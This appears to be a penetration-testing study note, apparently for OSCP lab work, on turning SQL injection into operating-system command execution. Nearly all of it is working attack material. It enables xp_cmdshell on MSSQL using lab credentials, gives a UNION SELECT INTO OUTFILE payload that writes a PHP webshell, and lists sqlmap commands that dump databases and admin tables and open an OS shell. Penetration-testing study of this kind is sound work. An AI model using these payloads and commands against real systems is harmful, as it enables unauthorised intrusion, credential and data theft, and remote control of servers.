Manual & Automated Code Execution

Using SQLi to run OS Commands

https://null-byte.wonderhowto.com/how-to/use-sql-injection-run-os-commands-get-shell-0191405/

10.3.1 - Manual code execution

MSSQL - Enable xp_cmdshell

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth

EXECUTE sp_configure 'show advanced options', 1;

RECONFIGURE;

EXECUTE sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

EXECUTE xp_cmdshell 'whoami';

MySQL - Write webshell to disk via INTO OUTFILE directive

File location must be writable to the OS user running the DB software

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

We should be able to reach the webshell via something similar to:

192.168.50.1/tmp/webshell.php?cmd=id

10.3.2 - Automating the attack - SQLMap

do not use this on OSCP machines

Quickly find SQL injection points - set URL with -u and parameter with -p

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user

Dump the entire database

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump

Database & Table Enumeration - SQLMap

The following is an example of a potentially SQLi-vulnerable URL, testing the id parameter and running in non-interactive (batch) mode meaning it'll use default answers to any prompts. This is useful for scripting and automation.

sqlmap -u "http://192.168.218.162:55743/th4o4p/admin_pay.php?action=del&id=1" -p id --batch

Provided it finds an injection point, check available dbs.

sqlmap -u "http://192.168.218.162:55743/th4o4p/admin_pay.php?action=del&id=1" -p id --batch --dbs

Specify one of the outputted databases and enumerate tables.

sqlmap -u "http://192.168.218.162:55743/th4o4p/admin_pay.php?action=del&id=1" -p id --batch -D seacms --tables

Then dump information from interesting ones.

sqlmap -u "http://192.168.218.162:55743/th4o4p/admin_pay.php?action=del&id=1" -p id --batch -D seacms -T sea_admin --dump

OS command shell using SQLMap

First intercept a POST request and save it to a local text file on Kali

POST /search.php HTTP/1.1
Host: 192.168.50.19
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Origin: http://192.168.50.19
Connection: close
Referer: http://192.168.50.19/search.php
Cookie: PHPSESSID=vchu1sfs34oosl52l7pb1kag7d
Upgrade-Insecure-Requests: 1

item=test

Add file containing the POST request as an argument

sqlmap -r post.txt -p item  --os-shell  --web-root "/var/www/html/tmp"